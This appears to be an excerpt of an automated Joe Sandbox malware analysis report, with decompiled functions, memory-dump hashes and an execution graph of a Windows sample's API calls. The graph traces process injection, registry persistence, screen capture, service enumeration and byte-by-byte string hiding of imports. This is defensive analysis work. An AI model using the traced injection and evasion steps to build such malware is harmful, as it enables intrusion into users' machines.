                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                            • String ID:
                                                            • API String ID: 3016257755-0
                                                            • Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                            • Instruction ID: d1277c688e6782a7d6667dfe5775cee7c43dcd1ef85adbacd88dac02ee4583fb
                                                            • Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                            • Instruction Fuzzy Hash: 25018733000149FBCF126E85CD05CEE3F22BF08344B58846AFA9868171DB3AC971AB85
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 89%
                                                            			E004053C6(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _t15;
                                                            				LONG* _t21;
                                                            				long _t23;
                                                            				void* _t31;
                                                            				LONG* _t33;
                                                            				void* _t34;
                                                            				void* _t35;
                                                            
                                                            				_t35 = __eflags;
                                                            				_t29 = __edx;
                                                            				_t25 = __ebx;
                                                            				_push(0xc);
                                                            				_push(0x40e0c8);
                                                            				E004028CC(__ebx, __edi, __esi);
                                                            				_t31 = E00403255(__edx, __edi, _t35);
                                                            				_t15 =  *0x40fb8c; // 0xfffffffe
                                                            				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                            					E00401D99(0xd);
                                                            					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                            					_t33 =  *(_t31 + 0x68);
                                                            					 *(_t34 - 0x1c) = _t33;
                                                            					__eflags = _t33 -  *0x40f960; // 0x21e2870
                                                            					if(__eflags != 0) {
                                                            						__eflags = _t33;
                                                            						if(_t33 != 0) {
                                                            							_t23 = InterlockedDecrement(_t33);
                                                            							__eflags = _t23;
                                                            							if(_t23 == 0) {
                                                            								__eflags = _t33 - 0x40f538;
                                                            								if(__eflags != 0) {
                                                            									_push(_t33);
                                                            									E0040159B(_t25, _t31, _t33, __eflags);
                                                            								}
                                                            							}
                                                            						}
                                                            						_t21 =  *0x40f960; // 0x21e2870
                                                            						 *(_t31 + 0x68) = _t21;
                                                            						_t33 =  *0x40f960; // 0x21e2870
                                                            						 *(_t34 - 0x1c) = _t33;
                                                            						InterlockedIncrement(_t33);
                                                            					}
                                                            					 *(_t34 - 4) = 0xfffffffe;
                                                            					E00405461();
                                                            				} else {
                                                            					_t33 =  *(_t31 + 0x68);
                                                            				}
                                                            				if(_t33 == 0) {
                                                            					E00403688(_t25, _t29, _t31, 0x20);
                                                            				}
                                                            				return E00402911(_t33);
                                                            			}










                                                            0x004053c6
                                                            0x004053c6
                                                            0x004053c6
                                                            0x004053c6
                                                            0x004053c8
                                                            0x004053cd
                                                            0x004053d7
                                                            0x004053d9
                                                            0x004053e1
                                                            0x00405402
                                                            0x00405408
                                                            0x0040540c
                                                            0x0040540f
                                                            0x00405412
                                                            0x00405418
                                                            0x0040541a
                                                            0x0040541c
                                                            0x0040541f
                                                            0x00405425
                                                            0x00405427
                                                            0x00405429
                                                            0x0040542f
                                                            0x00405431
                                                            0x00405432
                                                            0x00405437
                                                            0x0040542f
                                                            0x00405427
                                                            0x00405438
                                                            0x0040543d
                                                            0x00405440
                                                            0x00405446
                                                            0x0040544a
                                                            0x0040544a
                                                            0x00405450
                                                            0x00405457
                                                            0x004053e9
                                                            0x004053e9
                                                            0x004053e9
                                                            0x004053ee
                                                            0x004053f2
                                                            0x004053f7
                                                            0x004053ff

                                                            APIs
                                                              • Part of subcall function 00403255: __getptd_noexit.LIBCMT ref: 00403256
                                                              • Part of subcall function 00403255: __amsg_exit.LIBCMT ref: 00403263
                                                            • __amsg_exit.LIBCMT ref: 004053F2
                                                            • __lock.LIBCMT ref: 00405402
                                                            • InterlockedDecrement.KERNEL32(?), ref: 0040541F
                                                            • InterlockedIncrement.KERNEL32(021E2870), ref: 0040544A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                            • String ID:
                                                            • API String ID: 2880340415-0
                                                            • Opcode ID: ad94bfbd25163ef528c88e08bbaf6c660ca8bd0c56b4544586975f52f2db6a12
                                                            • Instruction ID: 6de90fe8c58894b7ca0e5e06b5ae9b991f0c7d2b854e111021797f1a9afa1a73
                                                            • Opcode Fuzzy Hash: ad94bfbd25163ef528c88e08bbaf6c660ca8bd0c56b4544586975f52f2db6a12
                                                            • Instruction Fuzzy Hash: 2B018E31902B11ABD720AB66984579B7760FB04716F50413BF804777E1C73C6981CFAD
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 68%
                                                            			E0040B1B0(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags, char _a4) {
                                                            				signed int _v8;
                                                            				char _v9;
                                                            				char _v10;
                                                            				char _v11;
                                                            				char _v12;
                                                            				char _v13;
                                                            				char _v14;
                                                            				char _v15;
                                                            				char _v16;
                                                            				char _v17;
                                                            				char _v18;
                                                            				char _v19;
                                                            				char _v20;
                                                            				_Unknown_base(*)()* _v24;
                                                            				signed int _t19;
                                                            				intOrPtr _t30;
                                                            				signed int _t33;
                                                            
                                                            				_t30 = __edx;
                                                            				_t19 =  *0x40f020; // 0xebf16b9c
                                                            				_v8 = _t19 ^ _t33;
                                                            				_v20 = 0x43;
                                                            				_v19 = 0x72;
                                                            				_v18 = 0x65;
                                                            				_v17 = 0x61;
                                                            				_v16 = 0x74;
                                                            				_v15 = 0x65;
                                                            				_v14 = 0x46;
                                                            				_v13 = 0x69;
                                                            				_v12 = 0x6c;
                                                            				_v11 = 0x65;
                                                            				_v10 = 0x57;
                                                            				_v9 = 0;
                                                            				_t14 =  &_v20; // 0x43
                                                            				_v24 = GetProcAddress(E0040B090(), _t14);
                                                            				_t16 =  &_a4; // 0x6c
                                                            				return E0040158C(_v24(0x40000000, 0, 0, 2, 0x80, 0), __ebx, _v8 ^ _t33, _t30, __edi, __esi,  *_t16);
                                                            			}




















                                                            0x0040b1b0
                                                            0x0040b1b6
                                                            0x0040b1bd
                                                            0x0040b1c0
                                                            0x0040b1c4
                                                            0x0040b1c8
                                                            0x0040b1cc
                                                            0x0040b1d0
                                                            0x0040b1d4
                                                            0x0040b1d8
                                                            0x0040b1dc
                                                            0x0040b1e0
                                                            0x0040b1e4
                                                            0x0040b1e8
                                                            0x0040b1ec
                                                            0x0040b1f0
                                                            0x0040b200
                                                            0x0040b215
                                                            0x0040b229

                                                            APIs
                                                              • Part of subcall function 0040B090: LoadLibraryA.KERNEL32(kernel32), ref: 0040B0C8
                                                            • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 0040B1FA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: CreateFileW$leW
                                                            • API String ID: 2574300362-2707618114
                                                            • Opcode ID: eb6e9f9a7f4b3ede8529b64f9fd584413d512e880886245fed96f70147fb1347
                                                            • Instruction ID: df7c4cf5ca23e89ccf356df2aebacb87d13a6769653d520ceff2dbdc8efae345
                                                            • Opcode Fuzzy Hash: eb6e9f9a7f4b3ede8529b64f9fd584413d512e880886245fed96f70147fb1347
                                                            • Instruction Fuzzy Hash: 4B012160D083C8EAEB11D7E8C809B9EBFA55B15708F0480D895847B2C2D6BA5718C77A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:2.1%
                                                            Dynamic/Decrypted Code Coverage:99.8%
                                                            Signature Coverage:21.6%
                                                            Total number of Nodes:509
                                                            Total number of Limit Nodes:25
                                                            execution_graph 21316 4655c64 20 API calls ___scrt_release_startup_lock 21437 4643e60 18 API calls 21438 4667e61 48 API calls 21319 466906f 11 API calls 2 library calls 21321 466a074 44 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21322 4651870 WSASetLastError 21441 466a67b 25 API calls _free 21442 465ea45 FreeLibrary 21323 463b840 20 API calls 21324 4648040 37 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21445 4631250 11 API calls 21327 464f850 28 API calls 21328 4642050 14 API calls 21446 4644250 51 API calls 21329 4654450 20 API calls 21331 463d420 75 API calls 21332 4639820 84 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21449 4632220 SetEvent WaitForSingleObject 21450 463a220 WaitForSingleObject CloseHandle RtlDeleteCriticalSection 21333 464d420 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21334 4655420 InterlockedCompareExchange InterlockedCompareExchange InterlockedCompareExchange HeapFree 21451 4652220 59 API calls 21335 466fc34 29 API calls __dosmaperr 21336 463a830 24 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21337 465e036 21 API calls _free 21454 4638230 11 API calls 21455 463fa30 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21339 4636400 52 API calls 21340 4639c00 143 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21341 4639000 48 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21342 4645400 13 API calls 21343 4644000 35 API calls 21344 4651800 12 API calls 21458 465e60d 27 API calls 3 library calls 21346 4661c0b 27 API calls 21459 466a208 38 API calls 2 library calls 21348 463a010 8 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21349 466f015 7 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21350 4631010 RtlEnterCriticalSection RtlLeaveCriticalSection 21461 4633e10 44 API calls 21462 4633c30 43 API calls 2 library calls 21461->21462 21463 4642a10 CreateDIBSection SelectObject BitBlt BitBlt DeleteObject 21351 4652c10 11 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21464 465621b 40 API calls 3 library calls 21465 46316e0 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21466 463f6e0 21 API calls 21467 46392e0 32 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21352 464ece0 112 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21353 4652ce0 htons WSAAddressToStringW htons StrPBrkW StrChrW 21468 465e6e3 8 API calls 2 library calls 21469 464cef5 6 API calls __CxxThrowException@8 21355 463ecf0 18 API calls 21357 46320f0 WaitForSingleObject CloseHandle 21470 463a2f0 CloseHandle 21472 464e6f0 29 API calls 21473 464aaf0 75 API calls 21358 4660cf9 35 API calls 21360 463b4c0 DeleteFileW GetFileAttributesW CreateFileW CloseHandle SetEvent 21474 46396c0 86 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21361 464e4c0 SetLastError WSAEventSelect SetEvent 21362 46428c0 GetDC CreateCompatibleBitmap GetDIBits ReleaseDC DeleteObject 21363 46450c0 14 API calls 2 library calls 21364 4653cc0 124 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21366 4642cd0 31 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21367 46518d0 SetLastError RtlEnterCriticalSection SetLastError RtlLeaveCriticalSection RtlLeaveCriticalSection 21368 46530d0 PostQueuedCompletionStatus SetLastError 21369 466acde RtlLeaveCriticalSection _abort 21370 46310a0 8 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21477 463eaa0 15 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21478 463f2a0 SetLastError 21371 464f4a0 WSAEventSelect WSAGetLastError SetLastError 21373 4654ca0 InterlockedCompareExchange InterlockedIncrement 21374 466cca0 38 API calls 21376 464871d 9 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21479 466faab 28 API calls 21481 4671ea9 43 API calls 3 library calls 21483 4668eb6 12 API calls 21377 4662cb4 11 API calls 20880 46560b6 20881 46560f4 dllmain_crt_process_detach 20880->20881 20882 46560c1 20880->20882 20889 46560d0 20881->20889 20883 46560e6 dllmain_crt_process_attach 20882->20883 20884 46560c6 20882->20884 20883->20889 20885 46560dc 20884->20885 20886 46560cb 20884->20886 20891 4655c38 20 API calls 20885->20891 20886->20889 20890 4655c57 20 API calls 20886->20890 20890->20889 20891->20889 21485 463f2b0 WaitForSingleObject SetLastError 21379 463a080 12 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21486 4632680 SetEvent 21381 4651480 10 API calls 21487 4653680 88 API calls 21488 4642683 9 API calls 21489 4672a95 41 API calls FindHandlerForForeignException 21382 4634090 28 API calls 21490 4638e90 90 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21491 4639a90 49 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21383 4647c90 SetEvent InterlockedExchange InterlockedExchange InterlockedExchange InterlockedExchange 20980 4656298 20981 46562a4 ___BuildCatchObject 20980->20981 20982 46562cd dllmain_raw 20981->20982 20983 46562c8 20981->20983 20985 46562b3 ___BuildCatchObject 20981->20985 20984 46562e7 dllmain_crt_dispatch 20982->20984 20982->20985 20993 464c680 20983->20993 20984->20983 20984->20985 20988 4656334 20988->20985 20989 465633d dllmain_crt_dispatch 20988->20989 20989->20985 20991 4656350 dllmain_raw 20989->20991 20990 464c680 407 API calls 20992 4656320 dllmain_crt_dispatch dllmain_raw 20990->20992 20991->20985 20992->20988 20994 464c68e 20993->20994 20995 464c689 20993->20995 20994->20988 20994->20990 20997 464c460 GetCommandLineW GetModuleFileNameW 20995->20997 21033 465d9be 20997->21033 21000 464c4b9 StrStrIW 21001 464c514 StrStrIW 21000->21001 21002 464c4cb CreateThread CloseHandle CreateThread CloseHandle 21000->21002 21005 464c520 CreateThread WaitForSingleObject CloseHandle 21001->21005 21006 464c55c StrStrIW 21001->21006 21004 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21002->21004 21271 4649e60 111 API calls 21002->21271 21003 464c5d6 21011 464c60d 21003->21011 21012 464c5df CreateThread WaitForSingleObject CloseHandle 21003->21012 21007 464c510 21004->21007 21008 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21005->21008 21272 464b5f0 159 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21005->21272 21009 464c56c 21006->21009 21010 464c66b 21006->21010 21007->20994 21016 464c558 21008->21016 21077 4649620 14 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21009->21077 21015 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21010->21015 21035 464c250 GetModuleFileNameW 21011->21035 21013 464c614 InternetOpenW 21012->21013 21270 464b5f0 159 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21012->21270 21013->21010 21019 464c62d InternetOpenUrlW 21013->21019 21020 464c677 21015->21020 21016->20994 21018 464c581 21018->21010 21078 464bd60 21018->21078 21021 464c65f InternetCloseHandle InternetCloseHandle 21019->21021 21022 464c648 InternetCloseHandle 21019->21022 21020->20994 21021->21010 21023 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21022->21023 21025 464c65b 21023->21025 21025->20994 21026 464c5a2 21026->21010 21029 464c5aa 21026->21029 21027 464c5b1 Sleep 21028 464bd60 62 API calls 21027->21028 21028->21029 21029->21027 21030 464c5c5 21029->21030 21031 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21030->21031 21032 464c5d2 21031->21032 21032->20994 21034 464c49f lstrcmpiW 21033->21034 21034->21000 21034->21003 21036 465d9be 21035->21036 21037 464c28b lstrcmpiW 21036->21037 21038 464c2d4 GetModuleFileNameW 21037->21038 21039 464c2a7 21037->21039 21040 464c2ec 21038->21040 21041 464c2c1 MoveFileExW 21039->21041 21042 464c44c 21039->21042 21040->21042 21043 464c2f8 PathFileExistsW 21040->21043 21044 464c31e ___scrt_fastfail 21041->21044 21045 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21042->21045 21043->21042 21043->21044 21110 4646fc0 21044->21110 21046 464c458 21045->21046 21046->21013 21048 464c33f 21049 464c345 21048->21049 21050 464c35b 21048->21050 21052 4646c70 15 API calls 21049->21052 21125 4646c70 21050->21125 21054 464c34c 21052->21054 21053 464c359 21139 4645960 LoadLibraryA GetProcAddress 21053->21139 21182 4646df0 6 API calls 21054->21182 21059 464c38e 21059->21042 21159 46496b0 21059->21159 21061 464c3b2 21167 46494d0 21061->21167 21063 464c3c5 21064 464c3df 21063->21064 21183 46378b0 12 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21063->21183 21066 46494d0 15 API calls 21064->21066 21067 464c3e9 21066->21067 21068 464c403 21067->21068 21184 46378b0 12 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21067->21184 21070 464bd60 62 API calls 21068->21070 21071 464c40c 21070->21071 21072 464c410 21071->21072 21073 464c431 VirtualFree DeleteFileW 21071->21073 21074 464c41c Sleep 21072->21074 21076 464c430 21072->21076 21073->21042 21075 464bd60 62 API calls 21074->21075 21075->21072 21076->21073 21077->21018 21079 465dea0 ___scrt_fastfail 21078->21079 21080 464bdac OpenSCManagerW 21079->21080 21081 464bdd9 EnumServicesStatusExW 21080->21081 21082 464bdca 21080->21082 21084 464be27 LocalAlloc 21081->21084 21085 464be0e CloseServiceHandle 21081->21085 21083 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21082->21083 21088 464bdd5 21083->21088 21086 464be40 CloseServiceHandle 21084->21086 21087 464be5f EnumServicesStatusExW 21084->21087 21089 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21085->21089 21091 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21086->21091 21092 464be95 CloseServiceHandle LocalFree 21087->21092 21093 464bebc LocalAlloc 21087->21093 21088->21026 21090 464be23 21089->21090 21090->21026 21094 464be5b 21091->21094 21095 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21092->21095 21096 464bfba LocalFree LocalFree CloseServiceHandle 21093->21096 21108 464bef1 21093->21108 21094->21026 21097 464beb8 21095->21097 21105 464bfd0 21096->21105 21097->21026 21098 464bf0a OpenServiceW 21102 464bf1c QueryServiceConfigW 21098->21102 21098->21108 21099 464c008 21100 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21099->21100 21103 464c01b 21100->21103 21101 464bfb4 21101->21096 21104 464bf87 CloseServiceHandle 21102->21104 21102->21108 21103->21026 21104->21108 21105->21099 21214 4649000 LoadLibraryA GetProcAddress 21105->21214 21107 464bf46 StrStrIW 21107->21104 21107->21108 21108->21098 21108->21101 21108->21104 21108->21107 21109 464bf75 CloseServiceHandle 21108->21109 21109->21108 21185 4645ca0 GetCurrentProcessId CreateToolhelp32Snapshot Process32FirstW 21110->21185 21113 4647004 ___scrt_fastfail 21192 4646ef0 OpenProcess 21113->21192 21114 4646fe7 21204 4645d40 10 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21114->21204 21116 4646fec 21116->21113 21117 4646ff2 21116->21117 21119 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21117->21119 21121 4647000 21119->21121 21120 4647027 21120->21117 21122 4647045 21120->21122 21121->21048 21123 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21122->21123 21124 46470cf 21123->21124 21124->21048 21205 4646050 21125->21205 21130 4646d56 RegCreateKeyExW 21133 4646d95 RegSetValueExW RegCloseKey 21130->21133 21134 4646dd0 21130->21134 21131 4646cff RegQueryValueExW RegCloseKey 21131->21130 21132 4646d40 21131->21132 21135 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21132->21135 21133->21132 21133->21134 21136 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21134->21136 21137 4646d52 21135->21137 21138 4646dde 21136->21138 21137->21053 21138->21053 21140 46459a2 21139->21140 21141 4645981 GetNativeSystemInfo 21139->21141 21142 4649770 21140->21142 21141->21140 21143 4649788 21142->21143 21144 464978a CreateFileW 21142->21144 21143->21144 21145 46498fc 21144->21145 21146 46497af GetFileSize 21144->21146 21145->21059 21147 46497c7 21146->21147 21148 46498f2 FindCloseChangeNotification 21146->21148 21149 464980d ReadFile 21147->21149 21152 46497d6 21147->21152 21148->21145 21150 4649826 21149->21150 21151 46498f1 21149->21151 21150->21151 21154 464984c SetFilePointer 21150->21154 21151->21148 21152->21151 21153 4649865 VirtualAlloc 21152->21153 21153->21151 21155 464987b ReadFile 21153->21155 21154->21153 21155->21151 21156 464988e 21155->21156 21157 4649895 VirtualFree CloseHandle 21156->21157 21158 46498b7 21156->21158 21157->21059 21158->21151 21160 46496cf 21159->21160 21161 4646050 8 API calls 21160->21161 21162 46496dc wsprintfW RegCreateKeyExW 21161->21162 21163 4649724 RegSetValueExW RegCloseKey 21162->21163 21164 4649750 21162->21164 21163->21164 21165 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21164->21165 21166 464975f 21165->21166 21166->21061 21168 4646050 8 API calls 21167->21168 21169 46494ec wsprintfW 21168->21169 21170 465dea0 ___scrt_fastfail 21169->21170 21171 464952b RegOpenKeyExW 21170->21171 21172 46495f3 21171->21172 21173 464955b RegQueryValueExW RegCloseKey 21171->21173 21175 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21172->21175 21173->21172 21174 464959c 21173->21174 21174->21172 21176 46495bb wsprintfW OpenEventW 21174->21176 21177 4649604 21175->21177 21178 46495ec CloseHandle 21176->21178 21179 4649608 21176->21179 21177->21063 21178->21172 21180 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21179->21180 21181 4649615 21180->21181 21181->21063 21182->21053 21183->21064 21184->21068 21186 4645cef 21185->21186 21187 4645d1b FindCloseChangeNotification 21185->21187 21190 4645d0c 21186->21190 21191 4645cfe Process32NextW 21186->21191 21188 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21187->21188 21189 4645d34 21188->21189 21189->21113 21189->21114 21190->21187 21191->21186 21191->21190 21193 4646fa5 21192->21193 21194 4646f20 K32GetModuleFileNameExW 21192->21194 21195 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21193->21195 21194->21193 21197 4646f39 21194->21197 21196 4646fb2 21195->21196 21196->21120 21198 4646f77 21197->21198 21199 4646f4e 21197->21199 21201 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21198->21201 21200 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21199->21200 21202 4646f73 21200->21202 21203 4646fa1 21201->21203 21202->21120 21203->21120 21204->21116 21206 465dea0 ___scrt_fastfail 21205->21206 21207 46461cf RegOpenKeyExW 21206->21207 21208 464623f 21207->21208 21209 46461ff RegQueryValueExW RegCloseKey 21207->21209 21210 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21208->21210 21209->21208 21211 464635d wsprintfW 21210->21211 21212 465dea0 21211->21212 21213 4646cd3 RegOpenKeyExW 21212->21213 21213->21130 21213->21131 21215 464922f 21214->21215 21216 4649049 RtlAdjustPrivilege 21214->21216 21268 464ad30 11 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21215->21268 21218 464923c 21216->21218 21219 464905e OpenProcess 21216->21219 21221 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21218->21221 21219->21218 21222 4649076 21219->21222 21220 4649234 21220->21218 21220->21219 21223 464924c 21221->21223 21224 4645960 3 API calls 21222->21224 21223->21105 21225 464907b 21224->21225 21226 4649250 VirtualAllocEx 21225->21226 21227 4649083 LoadLibraryA GetProcAddress 21225->21227 21229 4649370 CloseHandle 21226->21229 21230 464926f WriteProcessMemory 21226->21230 21228 46490a2 21227->21228 21228->21226 21231 46490b5 21228->21231 21234 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21229->21234 21232 4649362 VirtualFreeEx 21230->21232 21233 4649289 21230->21233 21254 4648c60 21231->21254 21232->21229 21233->21232 21269 4645c40 6 API calls 2 library calls 21233->21269 21236 4649389 21234->21236 21236->21105 21237 46490c1 21237->21229 21261 4648ec0 21237->21261 21239 4649298 21241 46492b7 LoadLibraryA GetProcAddress 21239->21241 21242 464929c CreateRemoteThread 21239->21242 21245 46492d2 21241->21245 21246 46492f9 LoadLibraryA GetProcAddress 21241->21246 21243 4649345 WaitForSingleObject 21242->21243 21244 46492b3 21242->21244 21249 4649356 21243->21249 21244->21241 21245->21243 21245->21246 21247 464931c 21246->21247 21247->21243 21247->21249 21248 4649218 21267 4648d90 GetModuleHandleW GetProcAddress GetProcAddress RtlRestoreLastWin32Error 21248->21267 21249->21232 21251 4649227 21251->21229 21252 46490e9 21252->21248 21253 46491fc WaitForSingleObject FindCloseChangeNotification 21252->21253 21253->21248 21255 4648c7e 21254->21255 21256 4648d19 21255->21256 21257 4648d39 GetModuleHandleW GetProcAddress GetProcAddress 21255->21257 21258 4648d6e 21255->21258 21259 4648d80 21255->21259 21256->21237 21257->21258 21258->21259 21260 4648d79 RtlRestoreLastWin32Error 21258->21260 21259->21237 21260->21259 21262 4648ede 21261->21262 21263 4648f79 21262->21263 21264 4648fa1 GetModuleHandleW GetProcAddress GetProcAddress 21262->21264 21265 4648fd6 21262->21265 21263->21252 21264->21265 21265->21263 21266 4648fe1 RtlRestoreLastWin32Error 21265->21266 21266->21263 21267->21251 21268->21220 21269->21239 21273 463e6e0 60 API calls 21270->21273 21274 464c0a0 90 API calls 21270->21274 21493 463af60 GetProcessHeap HeapFree 21385 4651560 14 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21387 4669d68 29 API calls _free 21389 4639170 40 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21494 464ab70 8 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21390 4651970 26 API calls 21391 466ed7f 42 API calls 2 library calls 21392 4647978 26 API calls 21393 4635d7c 33 API calls 4 library calls 21394 4631140 16 API calls 21395 4641d40 108 API calls 21396 4641940 40 API calls 21495 4643f40 31 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21496 467234e 49 API calls 9 library calls 21497 4671f48 ___InternalCxxFrameHandler 21398 4631550 7 API calls 21498 4631750 ___swprintf_l ___swprintf_l 21499 4642f50 116 API calls 21400 4653150 32 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21401 4636d20 111 API calls 21402 463352b RaiseException __CxxThrowException@8 21404 4638d30 64 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21405 4634130 104 API calls 21501 465e731 7 API calls 2 library calls 21502 466ef32 GetLastError WriteConsoleW CreateFileW 21503 463e700 72 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21406 4644100 WaitForMultipleObjects TerminateThread 